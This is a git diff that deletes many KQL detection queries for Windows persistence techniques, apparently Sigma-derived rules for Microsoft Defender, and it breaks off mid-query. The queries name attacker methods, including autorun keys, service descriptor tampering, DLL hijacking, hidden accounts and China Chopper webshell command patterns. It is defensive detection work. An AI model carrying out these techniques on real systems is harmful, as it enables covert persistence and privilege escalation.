--- a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql
deleted file mode 100644
index df2ed998..00000000
--- a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p"))
\ No newline at end of file
diff --git a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql
deleted file mode 100644
index 2d468438..00000000
--- a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger"
\ No newline at end of file
diff --git a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql b/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql
deleted file mode 100644
index 62bd55fb..00000000
--- a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
-A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
-
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\Control\\Print\\Monitors") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey contains "Control\\Print\\Environments" and RegistryKey contains "\\Drivers" and RegistryKey contains "\\VNC Printer"))))
\ No newline at end of file
diff --git a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index 0fd4d7cb..00000000
--- a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: high
-// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql
deleted file mode 100644
index d35ec172..00000000
--- a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: high
-// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Persistence/Atbroker_Registry_Change.kql b/Persistence/Atbroker_Registry_Change.kql
deleted file mode 100644
index 465dcede..00000000
--- a/Persistence/Atbroker_Registry_Change.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
-// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/Persistence/Bypass_UAC_Using_Event_Viewer.kql b/Persistence/Bypass_UAC_Using_Event_Viewer.kql
deleted file mode 100644
index 8ebc277f..00000000
--- a/Persistence/Bypass_UAC_Using_Event_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %"))
\ No newline at end of file
diff --git a/Persistence/COM_Hijacking_via_TreatAs.kql b/Persistence/COM_Hijacking_via_TreatAs.kql
deleted file mode 100644
index 1acd1872..00000000
--- a/Persistence/COM_Hijacking_via_TreatAs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/28
-// Level: medium
-// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")))
\ No newline at end of file
diff --git a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql b/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql
deleted file mode 100644
index 30e0a99f..00000000
--- a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects when a program changes the default file association of any extension to an executable.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
-// Tags: attack.persistence, attack.t1546.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile"))
\ No newline at end of file
diff --git a/Persistence/Change_Default_File_Association_Via_Assoc.kql b/Persistence/Change_Default_File_Association_Via_Assoc.kql
deleted file mode 100644
index 782118cf..00000000
--- a/Persistence/Change_Default_File_Association_Via_Assoc.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects file association changes using the builtin "assoc" command.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
-// Tags: attack.persistence, attack.t1546.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql b/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql
deleted file mode 100644
index 9db5f4d8..00000000
--- a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
-Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
-Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
-
-// Tags: attack.persistence, attack.t1574.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d ")
\ No newline at end of file
diff --git a/Persistence/Chopper_Webshell_Process_Pattern.kql b/Persistence/Chopper_Webshell_Process_Pattern.kql
deleted file mode 100644
index 41494db7..00000000
--- a/Persistence/Chopper_Webshell_Process_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), MSTI (query)
-// Date: 2022/10/01
-// Level: high
-// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")
\ No newline at end of file
diff --git a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
deleted file mode 100644
index 89bb9dfa..00000000
--- a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
-// Date: 2022/06/19
-// Level: medium
-// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
-// Tags: attack.persistence, attack.t1176
-DeviceProcessEvents
-| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/Persistence/Classes_Autorun_Keys_Modification.kql b/Persistence/Classes_Autorun_Keys_Modification.kql
deleted file mode 100644
index e4bc363b..00000000
--- a/Persistence/Classes_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey contains "\\lnkfile\\shellex\\ContextMenuHandlers"))))
\ No newline at end of file
diff --git a/Persistence/Common_Autorun_Keys_Modification.kql b/Persistence/Common_Autorun_Keys_Modification.kql
deleted file mode 100644
index de1f0fb4..00000000
--- a/Persistence/Common_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\poqexec.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler" or RegistryKey contains "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/Persistence/Control_Panel_Items.kql b/Persistence/Control_Panel_Items.kql
deleted file mode 100644
index de98b896..00000000
--- a/Persistence/Control_Panel_Items.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql b/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql
deleted file mode 100644
index 9ec0a25c..00000000
--- a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: high
-// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
-Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath =~ "C:\\program.exe"
\ No newline at end of file
diff --git a/Persistence/Creation_Of_Non-Existent_System_DLL.kql b/Persistence/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Persistence/Creation_Of_Non-Existent_System_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql b/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql
deleted file mode 100644
index b8dc45ff..00000000
--- a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/05/03
-// Level: high
-// Description: Sysmon registry detection of a local hidden user account.
-// Tags: attack.persistence, attack.t1136.001
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey contains "\\SAM\\SAM\\Domains\\Account\\Users\\Names" and RegistryKey endswith "$"
\ No newline at end of file
diff --git a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
deleted file mode 100644
index f9303a14..00000000
--- a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/09
-// Level: high
-// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\")))
\ No newline at end of file
diff --git a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql b/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql
deleted file mode 100644
index 47714943..00000000
--- a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver"))))
\ No newline at end of file
diff --git a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index d035ba97..00000000
--- a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not((((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\Setup\\") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or 